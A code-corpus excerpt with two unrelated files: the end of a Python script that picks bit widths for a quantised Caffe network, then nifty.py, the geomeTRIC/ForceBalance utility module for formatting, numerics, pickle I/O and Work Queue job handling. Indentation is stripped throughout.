print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
|
nifty.py
|
"""@package geometric.nifty Nifty functions, originally intended to be imported by any module within ForceBalance.
This file was copied over from ForceBalance to geomeTRIC in order to lighten the dependencies of the latter.
Table of Contents:
- I/O formatting
- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import os
import re
import shutil
import sys
from select import select
import numpy as np
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
# Set up the logger #
#================================#
try:
from .output import *
except ImportError:
from logging import *
class RawStreamHandler(StreamHandler):
"""Exactly like output.StreamHandler except it does no extra formatting
before sending logging messages to the stream. This is more compatible with
how output has been displayed in ForceBalance. Default stream has also been
changed from stderr to stdout"""
def __init__(self, stream = sys.stdout):
super(RawStreamHandler, self).__init__(stream)
def emit(self, record):
message = record.getMessage()
self.stream.write(message)
self.flush()
logger=getLogger()
logger.handlers = [RawStreamHandler(sys.stdout)]
logger.setLevel(INFO)
try:
import bz2
HaveBZ2 = True
except ImportError:
logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
HaveBZ2 = False
try:
import gzip
HaveGZ = True
except ImportError:
logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
HaveGZ = False
## Boltzmann constant
kb = 0.0083144100163
## Q-Chem to GMX unit conversion for energy
eqcgmx = 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -49621.9
# Conversion factors
bohr2ang = 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
# Gradient units
au2evang = 51.42209166566339
evang2au = 1.0 / au2evang
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
"""Printout of a 1-D vector.
@param[in] vec1d a 1-D vector
"""
v2a = np.array(vec1d)
for i in range(v2a.shape[0]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % v2a[i])
logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
""" Write an array to a string so we can use it to key a dictionary. """
return ' '.join([("%% .%ie " % precision % i) for i in vec1d])
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
"""Printout of a 2-D matrix.
@param[in] mat2d a 2-D matrix
"""
m2a = np.array(mat2d)
for i in range(m2a.shape[0]):
for j in range(m2a.shape[1]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % m2a[i][j])
logger.log(loglevel, '\n')
def grouper(iterable, n):
"""Collect data into fixed-length chunks or blocks"""
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
lzip = [[j for j in i if j is not None] for i in list(zip_longest(*args))]
return lzip
def encode(l):
return [[len(list(group)),name] for name, group in itertools.groupby(l)]
def segments(e):
# Takes encoded input.
begins = np.array([sum([k[0] for k in e][:j]) for j,i in enumerate(e) if i[1] == 1])
lens = np.array([i[0] for i in e if i[1] == 1])
return [(i, i+j) for i, j in zip(begins, lens)]
def commadash(l):
# Formats a list like [27, 28, 29, 30, 31, 88, 89, 90, 91, 100, 136, 137, 138, 139]
# into '27-31,88-91,100,136-139
L = sorted(l)
if len(L) == 0:
return "(empty)"
L.append(L[-1]+1)
LL = [i in L for i in range(L[-1])]
return ','.join('%i-%i' % (i[0]+1,i[1]) if (i[1]-1 > i[0]) else '%i' % (i[0]+1) for i in segments(encode(LL)))
def uncommadash(s):
# Takes a string like '27-31,88-91,100,136-139'
# and turns it into a list like [26, 27, 28, 29, 30, 87, 88, 89, 90, 99, 135, 136, 137, 138]
L = []
try:
for w in s.split(','):
ws = w.split('-')
a = int(ws[0])-1
if len(ws) == 1:
b = int(ws[0])
elif len(ws) == 2:
b = int(ws[1])
else:
logger.warning("Dash-separated list cannot exceed length 2\n")
raise
if a < 0 or b <= 0 or b <= a:
if a < 0 or b <= 0:
logger.warning("Items in list cannot be zero or negative: %d %d\n" % (a, b))
else:
logger.warning("Second number cannot be smaller than first: %d %d\n" % (a, b))
raise
newL = range(a,b)
if any([i in L for i in newL]):
logger.warning("Duplicate entries found in list\n")
raise
L += newL
if sorted(L) != L:
logger.warning("List is out of order\n")
raise
except:
logger.error('Invalid string for converting to list of numbers: %s\n' % s)
raise RuntimeError
return L
def natural_sort(l):
""" Return a natural sorted list. """
# Convert a character to a digit or a lowercase character
convert = lambda text: int(text) if text.isdigit() else text.lower()
# Split string into "integer" and "noninteger" fields and convert each one
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# Sort strings using these keys in descending order of importance, I guess.
return sorted(l, key = alphanum_key)
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
"""Cool-looking printout for slick formatting of output.
@param[in] text The string that the printout is based upon. This function
will print out the string, ANSI-colored and enclosed in the symbol
for example:\n
<tt> ################# </tt>\n
<tt> ### I am cool ### </tt>\n
<tt> ################# </tt>
@param[in] sym The surrounding symbol\n
@param[in] bold Whether to use bold print
@param[in] color The ANSI color:\n
1 red\n
2 green\n
3 yellow\n
4 blue\n
5 magenta\n
6 cyan\n
7 white
@param[in] bottom The symbol for the bottom bar
@param[in] minwidth The minimum width for the box, if the text is very short
then we insert the appropriate number of padding spaces
@return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
"""
def newlen(l):
return len(re.sub("\x1b\[[0-9;]*m","",l))
text = text.split('\n')
width = max(minwidth,max([newlen(line) for line in text]))
bar = ''.join([sym2 for i in range(width + 6)])
bar = sym + bar + sym
#bar = ''.join([sym for i in range(width + 8)])
logger.info('\r'+bar + '\n')
for ln, line in enumerate(text):
if type(center) is list: c1 = center[ln]
else: c1 = center
if c1:
padleft = ' ' * (int((width - newlen(line))/2))
else:
padleft = ''
padright = ' '* (width - newlen(line) - len(padleft))
if ansi is not None:
ansi = str(ansi)
logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
elif color is not None:
if color == 0 and bold:
logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
elif color == 0:
logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
else:
logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
# if color == 3 or color == 7:
# print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
# else:
# print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
else:
warn_press_key("Inappropriate use of printcool")
logger.info(bar + '\n')
botbar = ''.join([bottom for i in range(width + 8)])
return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
"""See documentation for printcool; this is a nice way to print out keys/values in a dictionary.
The keys in the dictionary are sorted before printing out.
@param[in] dict The dictionary to be printed
@param[in] title The title of the printout
"""
if Dict is None: return
bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
def magic_string(str):
# This cryptic command returns a string with the number of characters specified as a variable. :P
# Useful for printing nice-looking dictionaries, i guess.
# print "\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"'))
return eval("\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"')))
if isinstance(Dict, OrderedDict):
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
else:
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
"""ONLY matches integers! If you have a decimal point? None shall pass!
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is an integer (only +/- sign followed by digits)
"""
try:
word = str(word)
except:
return False
return re.match('^[-+]?[0-9]+$', word)
def isfloat(word):
"""Matches ANY number; it can be a decimal, scientific notation, what have you
CAUTION - this will also match an integer.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is any number
"""
try: word = str(word)
except: return False
if len(word) == 0: return False
return re.match('^[-+]?[0-9]*\.?[0-9]*([eEdD][-+]?[0-9]+)?$',word)
def isdecimal(word):
"""Matches things with a decimal only; see isint and isfloat.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is a number with a decimal point
"""
try: word = str(word)
except: return False
return isfloat(word) and not isint(word)
def floatornan(word):
"""Returns a big number if we encounter NaN.
@param[in] word The string to be converted
@return answer The string converted to a float; if not a float, return 1e10
@todo I could use suggestions for making this better.
"""
big = 1e10
if isfloat(word):
return float(word)
else:
logger.info("Setting %s to % .1e\n" % big)
return big
def col(vec):
"""
Given any list, array, or matrix, return a 1-column matrix.
Input:
vec = The input vector that is to be made into a column
Output:
A column matrix
"""
return np.matrix(np.array(vec).reshape(-1, 1))
def row(vec):
"""Given any list, array, or matrix, return a 1-row matrix.
@param[in] vec The input vector that is to be made into a row
@return answer A row matrix
"""
return np.matrix(np.array(vec).reshape(1, -1))
def flat(vec):
"""Given any list, array, or matrix, return a single-index array.
@param[in] vec The data to be flattened
@return answer The flattened data
"""
return np.array(vec).reshape(-1)
def est124(val):
"""Given any positive floating point value, return a value [124]e+xx
that is closest to it in the log space.
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log4 = 0.6020599913279624
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log4):
fac = 2.0
elif logfrac < 0.5*(log4+log10):
fac = 4.0
else:
fac = 10.0
return fac*10**logint
def est1234568(val):
"""Given any positive floating point value, return a value [1234568]e+xx
that is closest to it in the log space. Just because I don't like seven
and nine. Call me a numberist?
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log3 = np.log10(3)
log4 = 0.6020599913279624
log5 = np.log10(5)
log6 = np.log10(6)
log8 = np.log10(8)
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log3):
fac = 2.0
elif logfrac < 0.5*(log3+log4):
fac = 3.0
elif logfrac < 0.5*(log4+log5):
fac = 4.0
elif logfrac < 0.5*(log5+log6):
fac = 5.0
elif logfrac < 0.5*(log6+log8):
fac = 6.0
elif logfrac < 0.5*(log8+log10):
fac = 8.0
else:
fac = 10.0
return fac*10**logint
def monotonic(arr, start, end):
# Make sure an array is monotonically decreasing from the start to the end.
a0 = arr[start]
i0 = start
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
arr[i0:i+1] = np.linspace(a0, arr[i], i-i0+1)
a0 = arr[i]
i0 = i
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
arr[i:i0+1] = np.linspace(arr[i], a0, i0-i+1)
a0 = arr[i]
i0 = i
i -= 1
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
"""
Return the indices of an array corresponding to strictly monotonic
decreasing behavior.
Parameters
----------
arr : numpy.ndarray
Input array
start : int
Starting index (first element if None)
end : int
Ending index (last element if None)
Returns
-------
indices : numpy.ndarray
Selected indices
"""
if start is None:
start = 0
if end is None:
end = len(arr) - 1
a0 = arr[start]
idx = [start]
if verbose: print("Starting @ %i : %.6f" % (start, arr[start]))
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: print("Including %i : %.6f" % (i, arr[i]))
else:
if verbose: print("Excluding %i : %.6f" % (i, arr[i]))
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: print("Including %i : %.6f" % (i, arr[i]))
else:
if verbose: print("Excluding %i : %.6f" % (i, arr[i]))
i -= 1
return np.array(idx)
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
"""Given two vectors vec1 and vec2, project out the component of vec1
that is along the vec2-direction.
@param[in] vec1 The projectee (i.e. output is some modified version of vec1)
@param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
@return answer A copy of vec1 but with the vec2-component projected out.
"""
v2u = vec2/np.linalg.norm(vec2)
return vec1 - v2u*np.dot(vec1, v2u)
def invert_svd(X,thresh=1e-12):
"""
Invert a matrix using singular value decomposition.
@param[in] X The matrix to be inverted
@param[in] thresh The SVD threshold; eigenvalues below this are not inverted but set to zero
@return Xt The inverted matrix
"""
u,s,vh = np.linalg.svd(X, full_matrices=0)
uh = np.matrix(np.transpose(u))
v = np.matrix(np.transpose(vh))
si = s.copy()
for i in range(s.shape[0]):
if abs(s[i]) > thresh:
si[i] = 1./s[i]
else:
si[i] = 0.0
si = np.matrix(np.diag(si))
Xt = v*si*uh
return Xt
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
"""
@code
__ __
| |
| 1 (x0) (x0)^2 (x0)^3 |
| 1 (x1) (x1)^2 (x1)^3 |
| 1 (x2) (x2)^2 (x2)^3 |
| 1 (x3) (x3)^2 (x3)^3 |
| 1 (x4) (x4)^2 (x4)^3 |
|__ __|
@endcode
@param[in] X (2-D array) An array of X-values (see above)
@param[in] Y (array) An array of Y-values (only used in getting the least squares coefficients)
@param[in] w (array) An array of weights, hopefully normalized to one.
@param[out] Beta The least-squares coefficients
@param[out] Hat The hat matrix that takes linear combinations of data y-values to give fitted y-values (weights)
@param[out] yfit The fitted y-values
@param[out] MPPI The Moore-Penrose pseudoinverse (multiply by Y to get least-squares coefficients, multiply by dY/dk to get derivatives of least-squares coefficients)
"""
# X is a 'tall' matrix.
X = np.matrix(x)
Y = col(y)
n_x = X.shape[0]
n_fit = X.shape[1]
if n_fit > n_x:
logger.warning("Argh? It seems like this problem is underdetermined!\n")
# Build the weight matrix.
if w is not None:
if len(w) != n_x:
warn_press_key("The weight array length (%i) must be the same as the number of 'X' data points (%i)!" % len(w), n_x)
w /= np.mean(w)
WH = np.matrix(np.diag(w**0.5))
else:
WH = np.matrix(np.eye(n_x))
# Make the Moore-Penrose Pseudoinverse.
# if n_fit == n_x:
# MPPI = np.linalg.inv(WH*X)
# else:
# This resembles the formula (X'WX)^-1 X' W^1/2
MPPI = np.linalg.pinv(WH*X)
Beta = MPPI * WH * Y
Hat = WH * X * MPPI
yfit = flat(Hat * Y)
# Return three things: the least-squares coefficients, the hat matrix (turns y into yfit), and yfit
# We could get these all from MPPI, but I might get confused later on, so might as well do it here :P
return np.array(Beta).flatten(), np.array(Hat), np.array(yfit).flatten(), np.array(MPPI)
#===========================================#
#| John's statisticalInefficiency function |#
#===========================================#
def statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
"""
Compute the (cross) statistical inefficiency of (two) timeseries.
Notes
The same timeseries can be used for both A_n and B_n to get the autocorrelation statistical inefficiency.
The fast method described in Ref [1] is used to compute g.
References
[1] J. D. Chodera, W. C. Swope, J. W. Pitera, C. Seok, and K. A. Dill. Use of the weighted
histogram analysis method for the analysis of simulated and parallel tempering simulations.
JCTC 3(1):26-41, 2007.
Examples
Compute statistical inefficiency of timeseries data with known correlation time.
>>> import timeseries
>>> A_n = timeseries.generateCorrelatedTimeseries(N=100000, tau=5.0)
>>> g = statisticalInefficiency(A_n, fast=True)
@param[in] A_n (required, numpy array) - A_n[n] is nth value of
timeseries A. Length is deduced from vector.
@param[in] B_n (optional, numpy array) - B_n[n] is nth value of
timeseries B. Length is deduced from vector. If supplied, the
cross-correlation of timeseries A and B will be estimated instead of
the autocorrelation of timeseries A.
@param[in] fast (optional, boolean) - if True, will use faster (but
less accurate) method to estimate correlation time, described in
Ref. [1] (default: False)
@param[in] mintime (optional, int) - minimum amount of correlation
function to compute (default: 3) The algorithm terminates after
computing the correlation time out to mintime when the correlation
function furst goes negative. Note that this time may need to be
increased if there is a strong initial negative peak in the
correlation function.
@return g The estimated statistical inefficiency (equal to 1 + 2
tau, where tau is the correlation time). We enforce g >= 1.0.
"""
# Create numpy copies of input arguments.
A_n = np.array(A_n)
if B_n is not None:
B_n = np.array(B_n)
else:
B_n = np.array(A_n)
# Get the length of the timeseries.
N = A_n.shape[0]
# Be sure A_n and B_n have the same dimensions.
if A_n.shape != B_n.shape:
logger.error('A_n and B_n must have same dimensions.\n')
raise ParameterError
# Initialize statistical inefficiency estimate with uncorrelated value.
g = 1.0
# Compute mean of each timeseries.
mu_A = A_n.mean()
mu_B = B_n.mean()
# Make temporary copies of fluctuation from mean.
dA_n = A_n.astype(np.float64) - mu_A
dB_n = B_n.astype(np.float64) - mu_B
# Compute estimator of covariance of (A,B) using estimator that will ensure C(0) = 1.
sigma2_AB = (dA_n * dB_n).mean() # standard estimator to ensure C(0) = 1
# Trap the case where this covariance is zero, and we cannot proceed.
if sigma2_AB == 0:
if warn:
logger.warning('Sample covariance sigma_AB^2 = 0 -- cannot compute statistical inefficiency\n')
return 1.0
# Accumulate the integrated correlation time by computing the normalized correlation time at
# increasing values of t. Stop accumulating if the correlation function goes negative, since
# this is unlikely to occur unless the correlation function has decayed to the point where it
# is dominated by noise and indistinguishable from zero.
t = 1
increment = 1
while t < N-1:
# compute normalized fluctuation correlation function at time t
C = sum( dA_n[0:(N-t)]*dB_n[t:N] + dB_n[0:(N-t)]*dA_n[t:N] ) / (2.0 * float(N-t) * sigma2_AB)
# Terminate if the correlation function has crossed zero and we've computed the correlation
# function at least out to 'mintime'.
if (C <= 0.0) and (t > mintime):
break
# Accumulate contribution to the statistical inefficiency.
g += 2.0 * C * (1.0 - float(t)/float(N)) * float(increment)
# Increment t and the amount by which we increment t.
t += increment
# Increase the interval if "fast mode" is on.
if fast: increment += 1
# g must be at least unity
if g < 1.0: g = 1.0
# Return the computed statistical inefficiency.
return g
def mean_stderr(ts):
"""Return mean and standard deviation of a time series ts."""
return np.mean(ts), \
np.std(ts)*np.sqrt(statisticalInefficiency(ts, warn=False)/len(ts))
# Slices a 2D array of data by column. The new array is fed into the statisticalInefficiency function.
def multiD_statisticalInefficiency(A_n, B_n=None, fast=False, mintime=3, warn=True):
n_row = A_n.shape[0]
n_col = A_n.shape[-1]
multiD_sI = np.zeros((n_row, n_col))
for col in range(n_col):
if B_n is None:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n, fast, mintime, warn)
else:
multiD_sI[:,col] = statisticalInefficiency(A_n[:,col], B_n[:,col], fast, mintime, warn)
return multiD_sI
#========================================#
#| Loading compressed pickles |#
#========================================#
def lp_dump(obj, fnm, protocol=0):
""" Write an object to a zipped pickle file specified by the path. """
# Safeguard against overwriting files? Nah.
# if os.path.exists(fnm):
# logger.error("lp_dump cannot write to an existing path")
# raise IOError
if os.path.islink(fnm):
logger.warn("Trying to write to a symbolic link %s, removing it first\n" % fnm)
os.unlink(fnm)
if HaveGZ:
f = gzip.GzipFile(fnm, 'wb')
elif HaveBZ2:
f = bz2.BZ2File(fnm, 'wb')
else:
f = open(fnm, 'wb')
Pickler(f, protocol).dump(obj)
f.close()
def lp_load(fnm):
""" Read an object from a bzipped file specified by the path. """
if not os.path.exists(fnm):
logger.error("lp_load cannot read from a path that doesn't exist (%s)" % fnm)
raise IOError
def load_uncompress():
logger.warning("Compressed file loader failed, attempting to read as uncompressed file\n")
f = open(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_bz2():
f = bz2.BZ2File(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
def load_gz():
f = gzip.GzipFile(fnm, 'rb')
try:
answer = Unpickler(f).load()
except UnicodeDecodeError:
answer = Unpickler(f, encoding='latin1').load()
f.close()
return answer
if HaveGZ:
try:
answer = load_gz()
except:
if HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
elif HaveBZ2:
try:
answer = load_bz2()
except:
answer = load_uncompress()
else:
answer = load_uncompress()
return answer
#==============================#
#| Work Queue stuff |#
#==============================#
try:
import work_queue
except:
pass
#logger.warning("Work Queue library import fail (You can't queue up jobs using Work Queue)\n")
# Global variable corresponding to the Work Queue object
WORK_QUEUE = None
# Global variable containing a mapping from target names to Work Queue task IDs
WQIDS = defaultdict(list)
def getWorkQueue():
global WORK_QUEUE
return WORK_QUEUE
def getWQIds():
global WQIDS
return WQIDS
def createWorkQueue(wq_port, debug=True, name='geomeTRIC'):
global WORK_QUEUE
if debug:
work_queue.set_debug_flag('all')
WORK_QUEUE = work_queue.WorkQueue(port=wq_port, catalog=True, exclusive=False, shutdown=False)
WORK_QUEUE.specify_name(name)
#WORK_QUEUE.specify_keepalive_timeout(8640000)
WORK_QUEUE.specify_keepalive_interval(8640000)
def destroyWorkQueue():
# Convenience function to destroy the Work Queue objects.
global WORK_QUEUE, WQIDS
WORK_QUEUE = None
WQIDS = defaultdict(list)
def queue_up(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of files) A list of locations of the input files.
@param[in] output_files (list of files) A list of locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
cwd = os.getcwd()
for f in input_files:
lf = os.path.join(cwd,f)
task.specify_input_file(lf,f,cache=False)
for f in output_files:
lf = os.path.join(cwd,f)
task.specify_output_file(lf,f,cache=False)
task.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_FCFS)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, %staskid %i\n" % (command, "tag %s, " % tag if tag != command else "", taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def queue_up_src_dest(wq, command, input_files, output_files, tag=None, tgt=None, verbose=True, print_time=60):
"""
Submit a job to the Work Queue. This function is a bit fancier in that we can explicitly
specify where the input files come from, and where the output files go to.
@param[in] wq (Work Queue Object)
@param[in] command (string) The command to run on the remote worker.
@param[in] input_files (list of 2-tuples) A list of local and
remote locations of the input files.
@param[in] output_files (list of 2-tuples) A list of local and
remote locations of the output files.
"""
global WQIDS
task = work_queue.Task(command)
for f in input_files:
# print f[0], f[1]
task.specify_input_file(f[0],f[1],cache=False)
for f in output_files:
# print f[0], f[1]
task.specify_output_file(f[0],f[1],cache=False)
task.specify_algorithm(work_queue.WORK_QUEUE_SCHEDULE_FCFS)
if tag is None: tag = command
task.specify_tag(tag)
task.print_time = print_time
taskid = wq.submit(task)
if verbose:
logger.info("Submitting command '%s' to the Work Queue, taskid %i\n" % (command, taskid))
if tgt is not None:
WQIDS[tgt.name].append(taskid)
else:
WQIDS["None"].append(taskid)
def wq_wait1(wq, wait_time=10, wait_intvl=1, print_time=60, verbose=False):
""" This function waits ten seconds to see if a task in the Work Queue has finished. """
global WQIDS
if verbose: logger.info('---\n')
if wait_intvl >= wait_time:
wait_time = wait_intvl
numwaits = 1
else:
numwaits = int(wait_time/wait_intvl)
for sec in range(numwaits):
task = wq.wait(wait_intvl)
if task:
exectime = task.cmd_execution_time/1000000
if verbose:
logger.info('A job has finished!\n')
logger.info('Job name = ' + task.tag + 'command = ' + task.command + '\n')
logger.info("status = " + task.status + '\n')
logger.info("return_status = " + task.return_status)
logger.info("result = " + task.result)
logger.info("host = " + task.hostname + '\n')
logger.info("execution time = " + exectime)
logger.info("total_bytes_transferred = " + task.total_bytes_transferred + '\n')
if task.result != 0:
oldid = task.id
oldhost = task.hostname
tgtname = "None"
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
tgtname = tnm
WQIDS[tnm].remove(task.id)
taskid = wq.submit(task)
logger.warning("Task '%s' (task %i) failed on host %s (%i seconds), resubmitted: taskid %i\n" % (task.tag, oldid, oldhost, exectime, taskid))
WQIDS[tgtname].append(taskid)
else:
if hasattr(task, 'print_time'):
print_time = task.print_time
if exectime > print_time: # Assume that we're only interested in printing jobs that last longer than a minute.
logger.info("Task '%s' (task %i) finished successfully on host %s (%i seconds)\n" % (task.tag, task.id, task.hostname, exectime))
for tnm in WQIDS:
if task.id in WQIDS[tnm]:
WQIDS[tnm].remove(task.id)
del task
if hasattr(wq.stats, 'workers_full'):
# Full workers statistic was added with CCTools 4.0
# But deprecated with CCTools 4.1 (so if they're equal we don't add them.)
nbusy = wq.stats.workers_busy + wq.stats.workers_full
else:
nbusy = wq.stats.workers_busy
Complete = wq.stats.total_tasks_complete
Total = wq.stats.total_tasks_dispatched
if verbose:
logger.info("Workers: %i init, %i ready, %i busy, %i total joined, %i total removed\n" \
% (wq.stats.workers_init, wq.stats.workers_ready, nbusy, wq.stats.total_workers_joined, wq.stats.total_workers_removed))
logger.info("Tasks: %i running, %i waiting, %i total dispatched, %i total complete\n" \
% (wq.stats.tasks_running,wq.stats.tasks_waiting,Total,Complete))
logger.info("Data: %i / %i kb sent/received\n" % (int(wq.stats.total_bytes_sent/1000), int(wq.stats.total_bytes_received/1024)))
else:
logger.info("\r%s : %i/%i workers busy; %i/%i jobs complete\r" %\
(time.ctime(), nbusy, (wq.stats.total_workers_joined - wq.stats.total_workers_removed), Complete, Total))
if time.time() - wq_wait1.t0 > 900:
wq_wait1.t0 = time.time()
logger.info('\n')
wq_wait1.t0 = time.time()
def wq_wait(wq, wait_time=10, wait_intvl=10, print_time=60, verbose=False):
""" This function waits until the work queue is completely empty. """
while not wq.empty():
wq_wait1(wq, wait_time=wait_time, wait_intvl=wait_intvl, print_time=print_time, verbose=verbose)
#=====================================#
#| File and process management stuff |#
#=====================================#
def click():
""" Stopwatch function for timing. """
ans = time.time() - click.t0
click.t0 = time.time()
return ans
click.t0 = time.time()
# Back up a file.
def bak(path, dest=None):
oldf = path
newf = None
if os.path.exists(path):
dnm, fnm = os.path.split(path)
if dnm == '' : dnm = '.'
base, ext = os.path.splitext(fnm)
if dest is None:
dest = dnm
if not os.path.isdir(dest): os.makedirs(dest)
i = 1
while True:
fnm = "%s_%i%s" % (base,i,ext)
newf = os.path.join(dest, fnm)
if not os.path.exists(newf): break
i += 1
logger.info("Backing up %s -> %s\n" % (oldf, newf))
shutil.move(oldf,newf)
return newf
# Purpose: Given a file name and/or an extension, do one of the following:
# 1) If provided a file name, check the file, crash if not exist and err==True. Return the file name.
# 2) If list is empty but extension is provided, check if one file exists that matches
# the extension. If so, return the file name.
